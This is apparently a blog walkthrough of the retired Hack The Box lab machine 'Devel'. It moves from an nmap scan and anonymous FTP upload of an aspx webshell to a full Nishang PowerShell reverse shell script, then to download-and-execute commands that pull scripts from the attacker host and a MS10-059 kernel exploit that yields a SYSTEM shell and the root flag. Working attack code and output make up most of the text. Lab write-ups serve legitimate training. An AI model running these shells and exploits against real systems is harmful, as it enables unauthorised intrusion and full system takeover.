htb-devel-nl

Today we are going to solve another CTF challenge “Devel” which is categories as retired lab presented by Hack the Box for making online penetration practices. Challenges in this lab are very easy to complete even for beginners.

Level: Beginners

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of Devel is 10.10.10. 5 so let’s initiate with nmap port enumeration.

root@kali:~/htb/devel# nmap -sC 10.10.10.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-27 18:44 CET
Nmap scan report for 10.10.10.5
Host is up (0.027s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 01:06AM <DIR> aspnet_client
| 01-24-19 07:42PM 2834 devel.aspx
| 01-27-19 10:59AM 2859 file.aspx
| 01-26-19 11:41AM 2857 gay.aspx
| 03-17-17 04:37PM 689 iisstart.htm
| 01-25-19 12:47PM 2877 mshell.aspx
| 01-26-19 11:46AM 0 nogay.aspx
| 01-26-19 11:42PM 2876 task.aspx
| 01-27-19 08:10AM 6 test.html
|_03-17-17 04:37PM 184946 welcome.png
| ftp-syst: 
|_ SYST: Windows_NT
80/tcp open http
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-title: IIS7

Nmap done: 1 IP address (1 host up) scanned in 24.69 seconds

By using anonymous login credential you will get successfully access of FTP server via port 21.

root@kali:~/htb/devel# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
01-24-19  07:42PM                 2834 devel.aspx
01-27-19  10:59AM                 2859 file.aspx
01-26-19  11:41AM                 2857 gay.aspx
03-17-17  04:37PM                  689 iisstart.htm
01-25-19  12:47PM                 2877 mshell.aspx
01-26-19  11:46AM                    0 nogay.aspx
01-26-19  11:42PM                 2876 task.aspx
01-27-19  08:10AM                    6 test.html
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.
ftp> bin
200 Type set to I.
ftp> put shell.aspx
local: shell.aspx remote: shell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2817 bytes sent in 0.00 secs (47.1316 MB/s)
ftp>

We can see that an aspnet_client is present, so we try and upload an aspx webshell from the/usr/share/webshells/aspx folder in our Kali Linux machine.

This allows us to run system commands as the web server. We can now see more information about the system.

Without wasting time we used Nishang’s based puckieshell443.ps1

function Invoke-PowerShellTcp 
{ 
  
    [CmdletBinding(DefaultParameterSetName="reverse")] Param(

        [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
        [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
        [String]
        $IPAddress,

        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
        [Int]
        $Port,

        [Parameter(ParameterSetName="reverse")]
        [Switch]
        $Reverse,

        [Parameter(ParameterSetName="bind")]
        [Switch]
        $Bind

    )

    
    try 
    {
        #Connect back if the reverse switch is used.
        if ($Reverse)
        {
            $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)
        }

        #Bind to the provided port if Bind switch is used.
        if ($Bind)
        {
            $listener = [System.Net.Sockets.TcpListener]$Port
            $listener.start()    
            $client = $listener.AcceptTcpClient()
        } 

        $stream = $client.GetStream()
        [byte[]]$bytes = 0..65535|%{0}

        #Send back current username and computername
        $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
        $stream.Write($sendbytes,0,$sendbytes.Length)

        #Show an interactive PowerShell prompt
        $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
        $stream.Write($sendbytes,0,$sendbytes.Length)

        while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
        {
            $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
            $data = $EncodedText.GetString($bytes,0, $i)
            try
            {
                #Execute the command on the target.
                $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
            }
            catch
            {
                Write-Warning "Something went wrong with execution of command on the target." 
                Write-Error $_
            }
            $sendback2  = $sendback + 'PS ' + (Get-Location).Path + '> '
            $x = ($error[0] | Out-String)
            $error.clear()
            $sendback2 = $sendback2 + $x

            #Return the results
            $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
            $stream.Write($sendbyte,0,$sendbyte.Length)
            $stream.Flush()  
        }
        $client.Close()
        if ($listener)
        {
            $listener.Stop()
        }
    }
    catch
    {
        Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port." 
        Write-Error $_
    }
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.15 -Port 443

Then transfer your puckieshell443.ps1 file into victims’ system

c:\Python37>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.5 - - [06/Feb/2019 15:05:51] "GET /puckieshell443.ps1 HTTP/1.1" 200 -
powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.15/puckieshell443.ps1')

Now time to execute our shell through a web browser as shown below in the image.

http://10.10.10.5/cmdpuck.aspx

 

After executing uploaded backdoor file come back to Netcat Listener and wait for session.

c:\PENTEST>nc -lvp 443
listening on [any] 443 ...
10.10.10.5: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.5] 49163: NO_DATA
Windows PowerShell running as user DEVEL$ on DEVEL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>whoami
iis apppool\web

Then I run a post Sherlock exploit

PS C:\windows\temp> iex(new-object net.webclient).downloadstring('http://10.10.14.15/Sherlock.ps1')


Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Appears Vulnerable

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Appears Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable

We use the windows exploit suggester against the systeminfo and note that this machine is vulnerable to MS10-059 and MS11-046.

https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS10-059/MS10-059.exe
c:\Python37>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.5 - - [06/Feb/2019 19:23:11] "GET /puckieshell443.ps1 HTTP/1.1" 200 -
10.10.10.5 - - [06/Feb/2019 19:30:21] "GET /MS10-059.exe HTTP/1.1" 200 -
PS C:\windows\temp> (new-object net.webclient).downloadfile('http://10.10.14.20/MS10-059.exe', 'C:\windows\temp\MS10-059.exe')
PS C:\windows\temp> dir MS10-059.exe


    Directory: C:\windows\temp


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---         10/2/2019   3:37 ??      51434 lp.exe
-a---         10/2/2019   4:24 ??     784384 MS10-059.exe

PS C:\windows\temp> ./MS10-059.exe 10.10.14.20 9876

/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR>

Wonderful!! We had completed the task and hacked this box.

C:\Users\jacco>nc -lvp 9876
listening on [any] 9876 ...
10.10.10.5: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.5] 49170: NO_DATA
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\users\public>whoami
whoami
nt authority\system
c:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
e62*****b4b

 

PS C:\windows\temp> (New-Object System.Net.WebClient).DownloadFile("http://10.10.14.20/MS10-015.zip", "C:\Windows\Temp\MS10-015.zip")

A simple way of using ExtractToDirectory from System.IO.Compression.ZipFile:

Add-Type -AssemblyName System.IO.Compression.FileSystem
function unzip {
    param( [string]$ziparchive, [string]$extractpath )
    [System.IO.Compression.ZipFile]::ExtractToDirectory( $ziparchive, $extractpath )
}

unzip "D:\file.zip" "C:\temp"

 

Author: Puckiestyle

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *